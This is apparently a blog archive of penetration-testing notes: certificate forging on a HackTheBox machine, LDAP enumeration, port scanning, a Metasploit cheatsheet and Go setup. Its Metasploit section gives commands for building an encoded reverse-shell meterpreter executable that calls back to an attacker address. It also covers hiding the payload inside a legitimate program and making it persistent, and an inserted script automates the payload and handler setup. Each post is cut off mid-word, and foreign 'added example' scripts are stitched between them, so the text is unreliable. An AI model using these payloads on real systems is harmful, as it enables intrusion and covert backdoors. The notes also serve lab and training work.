
Posts

Showing posts from October, 2019

Creating Self Signed Certificate

Sometimes we need a client certificate that a target's own CA will accept (the post calls it a self-signed certificate; strictly it is a certificate signed by the site's CA rather than by a public one). To create it we need the CA's website.cer file and the CA's private key. Download the CA certificate from the website, import it and save it. Then start creating a new certificate.

Example from LaCasaDePapel:

rlwrap nc 10.10.10.131 6200                 // gets a responsive shell
scandir("/home/berin")
file_get_contents("/home/nairobi/ca.key")

Let's verify that the private key we have matches the certificate we have: the public key derived from ca.key below must be identical to the public key embedded in the CA certificate, otherwise anything we sign with it will be rejected.

openssl pkey -in ca.key -pubout
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13
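The rest of the procedure the post describes (check that ca.key really belongs to the CA certificate, then make a client key, CSR and CA-signed certificate and bundle it as PKCS#12 for the browser) as an added, runnable example. This is not code from the original post or from the box: the CA here is a throwaway one generated locally so the script works offline, the ca.key/ca.cer names follow the post, and WORK, the CN values and the p12 password are assumptions.

```shell
#!/bin/sh
# Added example: mint a client certificate signed by a CA private key and check
# that a key and a certificate belong together.  ca.key / ca.cer are the names
# the post uses; here they are a throwaway CA generated locally (constructed),
# not the key read off the target.  WORK is an assumption.
set -eu

WORK="${WORK:-$(mktemp -d)}"

# Throwaway CA (constructed) so the rest of the script runs offline.
make_ca() {
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
    -subj "/CN=constructed-ca" \
    -keyout "$WORK/ca.key" -out "$WORK/ca.cer" 2>/dev/null
}

# Does private key $1 belong to certificate $2?  Both sides are reduced to the
# DER-encoded public key and hashed, so the check is one string comparison.
# Prints "match" or "mismatch".
key_matches_cert() {
  key_hash=$(openssl pkey -in "$1" -pubout -outform DER 2>/dev/null | openssl sha256)
  cert_hash=$(openssl x509 -in "$2" -noout -pubkey \
              | openssl pkey -pubin -outform DER 2>/dev/null | openssl sha256)
  if [ "$key_hash" = "$cert_hash" ]; then echo match; else echo mismatch; fi
}

# Client key + CSR, signed by the CA, bundled as PKCS#12 for a browser, then
# validated against the CA certificate.  $1 is the CN to use.
make_client_cert() {
  name="$1"
  openssl req -newkey rsa:2048 -nodes -subj "/CN=$name" \
    -keyout "$WORK/$name.key" -out "$WORK/$name.csr" 2>/dev/null
  openssl x509 -req -in "$WORK/$name.csr" -days 1 \
    -CA "$WORK/ca.cer" -CAkey "$WORK/ca.key" -CAcreateserial \
    -out "$WORK/$name.cer" 2>/dev/null
  # the export password is a placeholder for the demo
  openssl pkcs12 -export -in "$WORK/$name.cer" -inkey "$WORK/$name.key" \
    -certfile "$WORK/ca.cer" -passout pass:changeit -out "$WORK/$name.p12"
  # must print "<file>: OK": the client cert chains to the CA we hold the key for
  openssl verify -CAfile "$WORK/ca.cer" "$WORK/$name.cer"
}

demo() {
  make_ca
  make_client_cert client
  echo "ca.key     vs ca.cer:     $(key_matches_cert "$WORK/ca.key" "$WORK/ca.cer")"
  echo "client.key vs client.cer: $(key_matches_cert "$WORK/client.key" "$WORK/client.cer")"
  echo "client.key vs ca.cer:     $(key_matches_cert "$WORK/client.key" "$WORK/ca.cer")"
  echo "files in $WORK"
}

if [ "${1:-}" = demo ]; then demo; fi
```

Run it as `sh mkcert.sh demo`. Against a real target, replace make_ca with the ca.key you recovered and the CA certificate you downloaded, run key_matches_cert on that pair first, and only then sign a CSR with it; the resulting client.p12 is what you import into the browser.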

Ldap Enum - Port 389, 636, 3269

Anonymous bind (-x) first, then read the naming contexts from the root DSE, then dump the whole subtree under the base DN you found (newer OpenLDAP clients want -H ldap://10.10.10.119 instead of -h):

ldapsearch -x -h 10.10.10.119
ldapsearch -x -h 10.10.10.119 -s base namingcontexts
ldapsearch -x -h 10.10.10.119 -b 'dc=lightweight,dc=htb'

# extended LDIF
#
# LDAPv3
# base <dc=lightweight,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# lightweight.htb
dn: dc=lightweight,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: lightweight htb
dc: lightweight

# Manager, lightweight.htb
dn: cn=Manager,dc=lightweight,dc=htb
objectClass: organizationalRole
cn: Manager
description: Directory Manager

# People, lightweight.htb
dn: ou=People,dc=lightweight,dc=htb
objectClass: organizationalUnit
ou: People

# Group, lightweight.htb
dn: ou=Group,dc=lightweight,dc=htb
objectClass: organizationalUnit
ou: Group

# ldapuser1, People, lightweight.htb
dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
uid: ldapuser1
cn: ldapuser1
sn: ldapuser1
mail: ldapuser1@lightweight.htb
objectClass: person
objectClass: organizationalPerson
o
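Reading user entries out of a dump like the one above by eye stops working once the directory has more than a handful of people, and a plain grep breaks on two LDIF details: long values are folded onto continuation lines (a leading space), and non-ASCII or binary values are emitted base64-encoded as "attr:: ...". The following is an added example, not from the original post, that parses ldapsearch output into one "uid mail dn" line per person entry; the sample input is constructed from the page's own output plus one made-up entry that exercises both details.

```shell
#!/bin/sh
# Added example: turn ldapsearch LDIF output into one "uid mail dn" line per
# person entry, handling folded lines and base64 ("::") values.
set -eu

# Constructed sample: the page's entries plus an invented ldapuser2 with a
# folded dn and a base64-encoded mail attribute.
sample_ldif() {
  cat <<'EOF'
# extended LDIF
#
# LDAPv3
# base <dc=lightweight,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# lightweight.htb
dn: dc=lightweight,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: lightweight htb
dc: lightweight

# People, lightweight.htb
dn: ou=People,dc=lightweight,dc=htb
objectClass: organizationalUnit
ou: People

# ldapuser1, People, lightweight.htb
dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
uid: ldapuser1
cn: ldapuser1
sn: ldapuser1
mail: ldapuser1@lightweight.htb
objectClass: person
objectClass: organizationalPerson

# ldapuser2, People, lightweight.htb (constructed: folded dn, base64 mail)
dn: uid=ldapuser2,ou=People,dc=lightweight,
 dc=htb
uid: ldapuser2
mail:: bGRhcHVzZXIyQGxpZ2h0d2VpZ2h0Lmh0Yg==
objectClass: person
EOF
}

# stdin: LDIF as printed by ldapsearch; stdout: "uid mail dn" for dn=uid=... entries
ldif_users() {
  awk '
    function emit() {
      if (dn ~ /^uid=/) print uid, mail, dn   # only person entries
      dn = uid = mail = ""
    }
    function handle(line,   i, attr, val, cmd) {
      if (line ~ /^#/) return               # ldapsearch comment
      if (line == "") { emit(); return }    # blank line ends an entry
      i = index(line, ":")
      if (i == 0) return
      attr = substr(line, 1, i - 1)
      val  = substr(line, i + 1)
      if (substr(val, 1, 1) == ":") {       # "attr:: <base64>"
        val = substr(val, 2); sub(/^ +/, "", val)
        cmd = "printf %s " val " | base64 -d"
        cmd | getline val; close(cmd)
      } else {
        sub(/^ +/, "", val)
      }
      if (attr == "dn")   dn   = val
      if (attr == "uid")  uid  = val
      if (attr == "mail") mail = val
    }
    /^ / { buf = buf substr($0, 2); next }  # folded continuation line
    { if (NR > 1) handle(buf); buf = $0 }   # one line of lookahead
    END { handle(buf); emit() }
  '
}

if [ "${1:-}" = demo ]; then sample_ldif | ldif_users; fi
```

Against a live target, pipe the real dump through the same function: `ldapsearch -x -H ldap://10.10.10.119 -b 'dc=lightweight,dc=htb' | ldif_users`. Attributes you care about beyond uid and mail (description, memberOf, userPassword) are a one-line addition in handle().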

Nmap & Service Enumeration - Commands and Process

RustScan for high speed open port detection
https://github.com/RustScan/RustScan/releases     # download the Debian package
dpkg -i filename
rustscan 10.10.10.10
rustscan 10.10.10.0/24 -p 80,443 --no-nmap

or you can use masscan (a --rate of 15000 against a /8 is fine in a lab, but on a client network it will take a long time and can knock over fragile devices; lower the rate and narrow the range):
masscan --rate 15000 -oB myscan.mass 10.0.0.0/8 --ports 0-65535

Reconnoitre for service enum
git clone https://github.com/codingo/Reconnoitre.git
cd Reconnoitre
python setup.py install
reconnoitre -t 10.10.10.10 --services -o new_recon

Vanquish - information gathering
git clone https://github.com/frizb/Vanquish.git
cd Vanquish
python2.7 Vanquish2.py -install
echo 192.168.126.133 >> test.txt
vanquish -hostFile test.txt -logging      # read the output, located in the hosts directory

sn1per - automated enum
git clone https://github.com/1N3/Sn1per
cd Sn1per
bash install.sh
# NORMAL MODE + OSINT + RECON
sniper -t <TARGET> -o -re
sniper -t 10.10.10.10 -m vulnscan
sniper -t 10.10.1
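The reason to run a fast sweeper first is to avoid running nmap's slow service detection against all 65535 ports. The glue between the two steps is rarely shown, so here is an added example (not from the original post or any of the tools above) that takes masscan's plain-text list output and produces one targeted `nmap -sV -sC` command per host. The masscan lines are constructed; the post used -oB (binary), this uses -oL, masscan's "open tcp <port> <host> <timestamp>" list format.

```shell
#!/bin/sh
# Added example: masscan list output -> one nmap service scan per host.
set -eu

# Constructed masscan -oL output for two hosts.
sample_masscan() {
  cat <<'EOF'
#masscan
open tcp 443 10.10.10.10 1571000000
open tcp 22 10.10.10.10 1571000001
open tcp 80 10.10.10.11 1571000002
open tcp 80 10.10.10.10 1571000003
# end
EOF
}

# stdin: masscan list output; stdout: "<host> <port,port,...>" with ports sorted
ports_by_host() {
  sort -k4,4 -k3,3n | awk '
    $1 == "open" && $2 == "tcp" {
      ports[$4] = (ports[$4] == "" ? $3 : (ports[$4] "," $3))
      if (!($4 in seen)) { seen[$4] = 1; order[++n] = $4 }   # keep host order
    }
    END { for (i = 1; i <= n; i++) print order[i], ports[order[i]] }
  '
}

# stdin: output of ports_by_host; stdout: one nmap service/script scan per host
nmap_commands() {
  while read -r host ports; do
    printf 'nmap -sV -sC -p %s -oA recon_%s %s\n' "$ports" "$host" "$host"
  done
}

if [ "${1:-}" = demo ]; then
  sample_masscan | ports_by_host | nmap_commands
fi
```

With real data: `masscan --rate 1000 -oL sweep.txt 10.10.10.0/24 --ports 0-65535 && ports_by_host < sweep.txt | nmap_commands | sh`. The -oA prefix keeps nmap's normal, greppable and XML output per host for whatever tooling comes next.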

Metasploit Commands Cheatsheet

Basic Metasploit commands

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=attacker_Ip -f exe -e x86/shikata_ga_nai -i 3 -b '\x00\xff' > /root/Desktop/encoded.exe
# caveat: x86/shikata_ga_nai is an x86-only encoder and msfvenom will not apply it to a windows/x64 payload; use an x64 encoder (for example x64/xor_dynamic) or drop -e

shellter --> shellter is a dynamic shellcode injection tool; it can be used to inject shellcode into native Windows applications
download any program to bind our payload to
download and open shellter in Windows
select "A"
select "N"
drag in the program our payload is to be bound to
select "stealth mode": y
L
1
set attacker_ip
set port 8080

--------------------------------

msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp   # must be exactly the payload msfvenom was given; a mismatched handler never catches the session
show options
set lhost attacker_Ip
set lport 8080

MAINTAINING A PERSISTENT CONNECTION
# get into a meterpreter session first
background
use exploit/windows/local/persistence
show options
set EXE_NAME service1
set DELAY 10
sessions -l                  # list sessions (sessions -i <id> to interact)
set session 3
show advanced
set EXE::CUSTOM /root/Desktop/
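The two mistakes that most often leave a handler sitting idle are a PAYLOAD that does not match what msfvenom built and an encoder from the wrong architecture. The following added example (my own helper, not from the original post or from Metasploit) generates the msfvenom command and a multi/handler resource script from one set of values, so they cannot drift apart, and picks an encoder that matches the payload architecture. Output file names, the LHOST/LPORT used in the demo and the choice of x64/xor_dynamic as the x64 encoder are assumptions.

```shell
#!/bin/sh
# Added example: one source of truth for payload, LHOST and LPORT, emitting
# both the msfvenom command and the msfconsole resource script.
set -eu

# $1 payload, $2 LHOST, $3 LPORT, $4 output exe; prints the msfvenom command.
# x86/shikata_ga_nai only encodes x86 shellcode, so x64 payloads get an x64
# encoder instead (assumption: x64/xor_dynamic is the one you want).
venom_cmd() {
  payload="$1"; lhost="$2"; lport="$3"; out="$4"
  case "$payload" in
    windows/x64/*) arch=x64; enc=x64/xor_dynamic ;;
    windows/*)     arch=x86; enc=x86/shikata_ga_nai ;;
    *) echo "unsupported payload: $payload" >&2; return 1 ;;
  esac
  cat <<EOF
msfvenom -a $arch --platform windows -p $payload LHOST=$lhost LPORT=$lport \\
  -e $enc -i 3 -b '\x00\xff' -f exe -o $out
EOF
}

# $1 payload, $2 LHOST, $3 LPORT; prints a resource script for msfconsole -r
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j
EOF
}

# Write both files into $4 (default: current dir) for one engagement.
stage() {
  payload="$1"; lhost="$2"; lport="$3"; dir="${4:-.}"
  venom_cmd  "$payload" "$lhost" "$lport" "$dir/encoded.exe" > "$dir/venom.sh"
  handler_rc "$payload" "$lhost" "$lport" > "$dir/handler.rc"
}

if [ "${1:-}" = demo ]; then
  venom_cmd  windows/x64/meterpreter/reverse_tcp 10.10.14.5 8080 encoded.exe
  handler_rc windows/x64/meterpreter/reverse_tcp 10.10.14.5 8080
fi
```

Typical use: `stage windows/x64/meterpreter/reverse_tcp 10.10.14.5 8080 ./ops && sh ops/venom.sh && msfconsole -q -r ops/handler.rc`. ExitOnSession false plus exploit -j keeps the handler listening for the persistence callbacks described above instead of exiting after the first session.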

Installing Go Packages

apt-get install golang
go run main.go                       # most likely we will be missing a few packages
export GOPATH=/root/go               # export the Go path
mkdir /root/go                       # make sure that path exists
go get github.com/satori/go.uuid     # downloading and installing packages in Go
go get golang.org/x/crypto/ssh/terminal
go run main.go
go build                             # compile a file -- creates an executable
(this GOPATH-style use of go get is how Go 1.14 and earlier work; from Go 1.16 on, modules are the default and dependencies are resolved per project)

Installing Go for developers
Go to https://golang.org/dl/ and copy the link, or use the one below:
wget https://dl.google.com/go/go1.14.3.linux-amd64.tar.gz
tar -xvf go1.14.3.linux-amd64.tar.gz -C /usr/local
chown -R root:root /usr/local/go
nano ~/.profile                      # add these at the bottom
export PATH=$PATH:/usr/local/go/bin  # without this line "go" is not found in a new shell
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
go version

Installing Go --> easy
Follow the process below to run Go scripts from anywhere in the operating system.
apt i
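The tarball install above runs a toolchain fetched over the network as root without checking it. The download page publishes a SHA-256 for every archive, and the added example below (not from the original post or from the Go project) wires that check into the same wget/tar/profile procedure, refusing to unpack on a mismatch, and adds the /usr/local/go/bin PATH entry. The version and digest are arguments because they change with every release; the tmp path and the idempotent profile edit are my assumptions.

```shell
#!/bin/sh
# Added example: install Go from the official tarball only if its SHA-256
# matches the value from https://golang.org/dl/ (now https://go.dev/dl/).
set -eu

# $1 file, $2 expected hex digest; returns 0 on match, 1 on mismatch.
verify_sha256() {
  if command -v sha256sum >/dev/null 2>&1; then
    actual=$(sha256sum "$1" | awk '{print $1}')
  else
    actual=$(shasum -a 256 "$1" | awk '{print $1}')   # macOS / BSD fallback
  fi
  [ "$actual" = "$2" ]
}

# Append line $2 to file $1 only if it is not already there (re-runnable).
ensure_line() {
  grep -qxF "$2" "$1" 2>/dev/null || printf '%s\n' "$2" >> "$1"
}

# $1 Go version (e.g. 1.14.3), $2 SHA-256 copied from the download page.
install_go() {
  ver="$1"; sum="$2"
  tarball="go${ver}.linux-amd64.tar.gz"
  wget -q "https://dl.google.com/go/${tarball}" -O "/tmp/${tarball}"
  if ! verify_sha256 "/tmp/${tarball}" "$sum"; then
    echo "checksum mismatch for ${tarball}: not installing" >&2
    return 1
  fi
  rm -rf /usr/local/go                        # replace any previous install cleanly
  tar -C /usr/local -xzf "/tmp/${tarball}"
  ensure_line "$HOME/.profile" 'export PATH=$PATH:/usr/local/go/bin'
  ensure_line "$HOME/.profile" 'export GOPATH=$HOME/go'
  ensure_line "$HOME/.profile" 'export PATH=$PATH:$GOPATH/bin'
  /usr/local/go/bin/go version
}

if [ "${1:-}" = install ]; then install_go "$2" "$3"; fi
```

Usage: `sudo sh install-go.sh install 1.14.3 <sha256 from the download page>`, then `. ~/.profile` (or open a new shell) so `go version` resolves. Pasting the digest from the HTTPS download page is what turns a plain download into a verified one; if the digest does not match, the script leaves the old /usr/local/go in place.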